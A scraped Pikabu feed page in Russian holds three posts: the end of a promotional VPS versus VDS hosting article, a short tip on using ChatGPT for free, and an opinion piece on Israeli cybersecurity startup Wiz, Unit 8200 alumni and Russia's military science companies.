4. **Безопасность**: При использовании VPN-сервисов, таких как Wireguard, вы можете создать дополнительный уровень безопасности для ваших серверов. Это особенно важно при работе с данными пользователей и другими конфиденциальными сведениями.

## Заключение

В заключение, VPS и VDS - это оба мощные инструменты для хостинга, но они подходят для разных потребностей и проектов. VPS предоставит вам более доступный вариант для экономичных задач, в то время как VDS обеспечит больше контроля и ресурсов для масштабируемых приложений. Прежде чем принимать решение, взвесьте все за и против, чтобы выбрать лучший сервер для ваших нужд.

https://vpsdedic.ru

Показать полностью
Стартап Развитие Информационная безопасность Инновации IT Тестирование Чат-бот Программа Тренд Google
2
1
Аноним
Аноним
10 месяцев назад
ИТ-проекты пикабушников

Как бесплатно пользоваться ChatGPT?⁠⁠

💡 Как бесплатно пользоваться ChatGPT?

Хотите попробовать ChatGPT, но не хотите тратить деньги? Отличные новости — это можно сделать бесплатно! 🎉

Вот что нужно:

  1. Зарегистрируйтесь на платформе OpenAI — у них есть бесплатный тариф с ограниченным количеством запросов.

  2. Используйте мобильные приложения, такие как Telegram-боты или браузерные расширения, которые дают доступ к ChatGPT. Многие из них предлагают бесплатные версии

  3. Пробные периоды: некоторые платформы предлагают бесплатные тестовые периоды для доступа к полным возможностям ChatGPT. Воспользуйтесь этим шансом!

Не упустите возможность испытать мощь искусственного интеллекта — это легко, удобно и, самое главное, бесплатно! 🚀

Как бесплатно пользоваться ChatGPT? Приложение, Сайт, Чат-бот, Программа, Тренд, ChatGPT, Gpt4, Google, Гайд, Информационная безопасность, Тестирование, Инновации, Бесплатно, Программы для телефона, Инструкция, Сервис, Дизайнер, Microsoft, Стартап
Показать полностью 1
[моё] Приложение Сайт Чат-бот Программа Тренд ChatGPT Gpt4 Google Гайд Информационная безопасность Тестирование Инновации Бесплатно Программы для телефона Инструкция Сервис Дизайнер Microsoft Стартап
5
a3atbb
a3atbb
1 год назад

Ответ на пост «Инвесторы оценили израильский стартап Wiz в $12 млрд»⁠⁠1

Стартап выходцев из израильской армии отказался от предложения Google — в чем здесь урок для России?

У Google развалилась рекордная сделка — специализирующийся на облачной безопасности израильский стартап Wiz отказался от предложения о покупке от американского гиганта за $23 млрд. Основатели компании сообщили, что вместо этого планируют выходить на IPO. История сама по себе любопытная, но для России в ней есть один интересный урок.

Дело в том, что основатели стартапа познакомились во время срочной службы в армии. Причем не в условной пехоте или танковых войсках, а в подразделении 8200 — это местная киберразведка с элементами научной роты. Там же они получили первичные навыки, причем далеко не они одни. В 8200 служили основатели десятков компаний, занимающихся безопасностью: Sentra, Cynomi, Imperva, Cybereason, Radware, Waze, и это только самые известные.

Их совокупная капитализация — миллиарды долларов. От treat intelligence и до виртуальных ИБ-ассистентов: в любой области кибербеза вы найдете компанию, основанную военными.

Причем в США ситуация похожая — множество бизнесменов и топ-менеджеров начинали работу в различных «лабораториях» под эгидой армии или ВВС. Самый яркий пример — недавно нанятый в Nvidia Шейн Шейнман, который вообще не факт, что погоны снял. Американское АНБ активно нанимает частных подрядчиков, у ЦРУ вообще есть собственный венчурный фонд. инвестирующий в потенциально перспективные разработки в области киберразведки. И вот ведь парадокс — никто не прячет все это за завесой тотальной секретности, как в Холодную войну.

А теперь поговорим о грустном — у нас уже 10 с лишним лет существуют научные роты. Вопрос — сколько они выпустили предпринимателей, ученых, инженеров? Сколько из прошедших там службу продолжают работу по специальности? Какие у них вообще достижения? Наверняка за 10 лет их должно быть немало, тем более что за это время там отслужило несколько тысяч человек. Кто-то из них точно должен был достичь успеха?

Кроме того, переток технических специалистов между силовыми структурами и коммерческим рынком крайне ограничен. Более того, принято считать, что именно выходцы из силовых структур на рынке почти наверняка будут проигрывать конкуренцию в том, что не касается их очень нишевых и очень специфических областей знаний. Как это вышло? Между государством и рынком практически нет обмена людьми и информацией. Спецслужбы традиционно закрылись.

При этом, как показывает практика, возможности современных корпоративных разведок вполне сопоставимы, а зачастую превосходят возможности разведывательных служб. У вас может не быть СОРМ или знаменитого ЦОДа АНБ в Блаффдейле — но у вас есть Pegasus. У вас есть специалисты по OSINT, у вас есть производители софта, который лучше, чем используемый разведками. В конце концов, когда ФБР потребовалось срочно вскрыть телефон покушавшегося на Трампа стрелка, они пошли не в Куантико, а к компании Cellebrite — те справились за 40 минут. Угадаете, где проходил службу ее основатель?

От Повёрнутые на Z войне

Ответ на пост «Инвесторы оценили израильский стартап Wiz в $12 млрд» Израиль, Стартап, Информационная безопасность, Wiz, Хакеры, Инновации, Единорог, Технологии, Финансирование, Длиннопост, Google, Nvidia, Тренд, Ответ на пост, Telegram (ссылка)
Показать полностью 1
Израиль Стартап Информационная безопасность Wiz Хакеры Инновации Единорог Технологии Финансирование Длиннопост Google Nvidia Тренд Ответ на пост Telegram (ссылка)
7
Посты не найдены
О нас
О Пикабу Контакты Реклама Сообщить об ошибке Сообщить о нарушении законодательства Отзывы и предложения Новости Пикабу Мобильное приложение RSS
Информация
Помощь Кодекс Пикабу Команда Пикабу Конфиденциальность Правила соцсети О рекомендациях О компании
Наши проекты
Блоги Работа Промокоды Игры Курсы
Партнёры
Промокоды Биг Гик Промокоды Lamoda Промокоды Мвидео Промокоды Яндекс Директ Промокоды Отелло Промокоды Aroma Butik Промокоды Яндекс Путешествия Постила Футбол сегодня
На информационном ресурсе Pikabu.ru применяются рекомендательные технологии